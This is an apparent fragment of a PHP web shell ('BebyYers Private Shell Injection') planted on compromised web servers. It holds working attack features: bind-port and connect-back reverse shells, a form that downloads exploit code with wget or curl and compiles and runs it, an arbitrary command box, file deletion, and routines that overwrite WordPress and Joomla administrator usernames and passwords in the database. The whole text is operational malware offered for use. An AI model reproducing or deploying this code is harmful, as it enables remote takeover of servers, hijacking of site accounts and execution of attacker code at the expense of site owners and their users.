2819 $msg = "Now script try connect to ".$ip." port ".$port." ...";
2820}
2821elseif (isset($_POST['expcompile']) && !empty($_POST['wurl']) && !empty($_POST['wcmd']))
2822{
2823 $pilihan = trim($_POST['pilihan']);
2824 $wurl = trim($_POST['wurl']);
2825 $namafile = download($pilihan,$wurl);
2826 if(is_file($namafile)) {
2827
2828 $msg = exe($wcmd);
2829 }
2830 else $msg = "error: file not found $namafile";
2831}
2832
2833?>
2834<table class="tabnet">
2835<tr><th>Port Binding</th><th>Connect Back</th><th>Load and Exploit</th></tr>
2836<tr>
2837<td>
2838<table>
2839<form method="post" action="?y=<?php echo $pwd; ?>&x=netsploit">
2840<tr><td>Port</td><td><input class="inputz" type="text" name="port" size="26" value="<?php echo $bindport ?>"></td></tr>
2841<tr><td>Password</td><td><input class="inputz" type="text" name="bind_pass" size="26" value="<?php echo $bindport_pass; ?>"></td></tr>
2842<tr><td>Use</td><td style="text-align:justify"><p><select class="inputz" size="1" name="use"><option value="Perl">Perl</option><option value="C">C</option></select>
2843<input class="inputzbut" type="submit" name="bind" value="Bind" style="width:120px"></td></tr></form>
2844</table>
2845</td>
2846<td>
2847<table>
2848<form method="post" action="?y=<?php echo $pwd; ?>&x=netsploit">
2849<tr><td>IP</td><td><input class="inputz" type="text" name="ip" size="26" value="<?php echo ((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1")); ?>"></td></tr>
2850<tr><td>Port</td><td><input class="inputz" type="text" name="backport" size="26" value="<?php echo $bindport; ?>"></td></tr>
2851<tr><td>Use</td><td style="text-align:justify"><p><select size="1" class="inputz" name="use"><option value="Perl">Perl</option><option value="C">C</option></select>
2852<input type="submit" name="backconn" value="Connect" class="inputzbut" style="width:120px"></td></tr></form>
2853</table>
2854</td>
2855<td>
2856<table>
2857<form method="post" action="?y=<?php echo $pwd; ?>&x=netsploit">
2858<tr><td>url</td><td><input class="inputz" type="text" name="wurl" style="width:250px;" value="www.some-code/exploits.c"></td></tr>
2859<tr><td>cmd</td><td><input class="inputz" type="text" name="wcmd" style="width:250px;" value="gcc -o exploits exploits.c;chmod +x exploits;./exploits;"></td>
2860</tr>
2861<tr><td><select size="1" class="inputz" name="pilihan">
2862<option value="wwget">wget</option>
2863<option value="wlynx">lynx</option>
2864<option value="wfread">fread</option>
2865<option value="wfetch">fetch</option>
2866<option value="wlinks">links</option>
2867<option value="wget">GET</option>
2868<option value="wcurl">curl</option>
2869</select></td><td colspan="2"><input type="submit" name="expcompile" class="inputzbut" value="Go" style="width:246px;"></td></tr></form>
2870</table>
2871</td>
2872</tr>
2873</table>
2874<div style="text-align:center;margin:2px;"><?php echo $msg; ?></div>
2875
2876<?php
2877}
2878elseif(isset($_GET['x']) && ($_GET['x'] == 'wp'))
2879{
2880?>
2881<form action="?y=<?php echo $pwd; ?>&x=wp" method="post">
2882
2883<?php
2884
2885echo "<center/><br/><b><font color=#00ff00>Wordpress Reset Password !</font></b><br>";
2886
2887 if(empty($_POST['pwd'])){
2888
2889echo "<FORM method='POST'>
2890<table class='tabnet' style='width:300px;'> <tr><th colspan='2'>Connect to mySQL server</th></tr> <tr><td> Hostname</td><td>
2891<input style='width:220px;' class='inputz' type='text' name='localhost' value='localhost' /></td></tr> <tr><td> Database</td><td>
2892<input style='width:220px;' class='inputz' type='text' name='database' value='wp-' /></td></tr> <tr><td> username</td><td>
2893<input style='width:220px;' class='inputz' type='text' name='username' value='wp-' /></td></tr> <tr><td> password</td><td>
2894<input style='width:220px;' class='inputz' type='text' name='password' value='**' /></td></tr>
2895<tr><td> User baru</td><td>
2896<input style='width:220px;' class='inputz' type='text' name='admin' value='admin' /></td></tr>
2897 <tr><td> Pass Baru</td><td>
2898<input style='width:80px;' class='inputz' type='text' name='pwd' value='123456' />
2899
2900<input style='width:19%;' class='inputzbut' type='submit' value='change!' name='send' /></FORM>
2901</td></tr> </table><br>
2902";
2903}else{
2904$localhost = $_POST['localhost'];
2905$database = $_POST['database'];
2906$username = $_POST['username'];
2907$password = $_POST['password'];
2908$pwd = $_POST['pwd'];
2909$admin = $_POST['admin'];
2910
2911
2912 @mysql_connect($localhost,$username,$password) or die(mysql_error());
2913 @mysql_select_db($database) or die(mysql_error());
2914
2915$hash = crypt($pwd);
2916$a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 1") or die(mysql_error());
2917$a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 1") or die(mysql_error());
2918$a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 2") or die(mysql_error());
2919$a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 2") or die(mysql_error());
2920$a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 3") or die(mysql_error());
2921$a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 3") or die(mysql_error());
2922$a4s=@mysql_query("UPDATE wp_users SET user_email ='".$SQL."' WHERE ID = 1") or die(mysql_error());
2923
2924
2925if($a4s){
2926echo "<b> Success ..!! :)) sekarang bisa login ke wp-admin</b> ";
2927}
2928
2929}
2930
2931
2932 echo "
2933 </div>"; }
2934
2935elseif(isset($_GET['x']) && ($_GET['x'] == 'jm'))
2936{
2937?>
2938<form action="?y=<?php echo $pwd; ?>&x=jm" method="post">
2939
2940<?php
2941
2942echo "<center/><br/><b><font color=#00ff00>Joomla Reset Password !</font></b><br>";
2943 if(empty($_POST['pwd'])){
2944echo "<FORM method='POST'><table class='tabnet' style='width:300px;'> <tr><th colspan='2'>Connect to mySQL </th></tr> <tr><td> Host</td><td>
2945<input style='width:270px;' class='inputz' type='text' name='localhost' value='localhost' /></td></tr> <tr><td> Database</td><td>
2946<input style='width:270px;' class='inputz' type='text' name='database' value='database' /></td></tr> <tr><td> username</td><td>
2947<input style='width:270px;' class='inputz' type='text' name='username' value='db_user' /></td></tr> <tr><td> password</td><td>
2948<input style='width:270px;' class='inputz' type='password' name='password' value='**' /></td></tr>
2949<tr><td> User baru</td><td>
2950<input style='width:270px;' class='inputz' name='admin' value='admin' /></td></tr>
2951 <tr><td> pass baru </td><td>123456 =
2952<input style='width:130px;' class='inputz' name='pwd' value='e10adc3949ba59abbe56e057f20f883e' />
2953
2954<input style='width:23%;' class='inputzbut' type='submit' value='change!' name='send' /></FORM>
2955</td></tr> </table><br>
2956";
2957}else{
2958$localhost = $_POST['localhost'];
2959$database = $_POST['database'];
2960$username = $_POST['username'];
2961$password = $_POST['password'];
2962$pwd = $_POST['pwd'];
2963$admin = $_POST['admin'];
2964@mysql_connect($localhost,$username,$password) or die(mysql_error());
2965@mysql_select_db($database) or die(mysql_error());
2966$hash = crypt($pwd);
2967$SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 62") or die(mysql_error());
2968$SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 62") or die(mysql_error());
2969$SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 63") or die(mysql_error());
2970$SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 63") or die(mysql_error());
2971$SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 64") or die(mysql_error());
2972$SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 64") or die(mysql_error());
2973$SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 65") or die(mysql_error());
2974$SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 65") or die(mysql_error());
2975if($SQL){
2976echo "<b>Success : skarang password barunya >>> - (123456)";
2977}
2978}
2979
2980 echo "
2981 </div>";
2982?>
2983
2984<?php
2985}
2986
2987
2988/* Shell */
2989
2990elseif(isset($_GET['x']) && ($_GET['x'] == 'shell')){ ?>
2991<form action="?y=<?php echo $pwd; ?>&x=shell" method="post">
2992<br><table class="cmdbox">
2993<tr><td colspan="2">
2994<textarea class="output" readonly>
2995<?php
2996if(isset($_POST['submitcmd'])) {
2997 echo @exe($_POST['cmd']);
2998}
2999?>
3000</textarea>
3001<tr><td colspan="2"><?php echo $prompt; ?><input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:60%;" value="" /><input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:12%;" /></td></tr>
3002</table>
3003</form>
3004<?php }
3005else {
3006if(isset($_GET['delete']) && ($_GET['delete'] != "")){
3007 $file = $_GET['delete'];
3008 @unlink($file);
3009}
3010elseif(isset($_GET['fdelete']) && ($_GET['fdelete'] != "")){
3011 @rmdir(rtrim($_GET['fdelete'],DIRECTORY_SEPARATOR));
3012}
3013elseif(isset($_GET['mkdir']) && ($_GET['mkdir'] != "")){
3014 $path = $pwd.$_GET['mkdir'];
3015 @mkdir($path);
3016}
3017 $buff = showdir($pwd,$prompt);
3018 echo $buff;
3019}
3020?>
3021
3022<center><center><br><br><div class="info">-== BebyYers Private Shell Injection ==-</div><br>
3023<div class="jaya"><b>
3024<script language="JavaScript"> Year=new Date(); var copyright=Year.getUTCFullYear(); document.write("© Ucage_48 Shell 2016 - " + copyright); </script>
3025<b></div></center><br><br>
3026</div>
3027</body>
3028</html>
3029</html>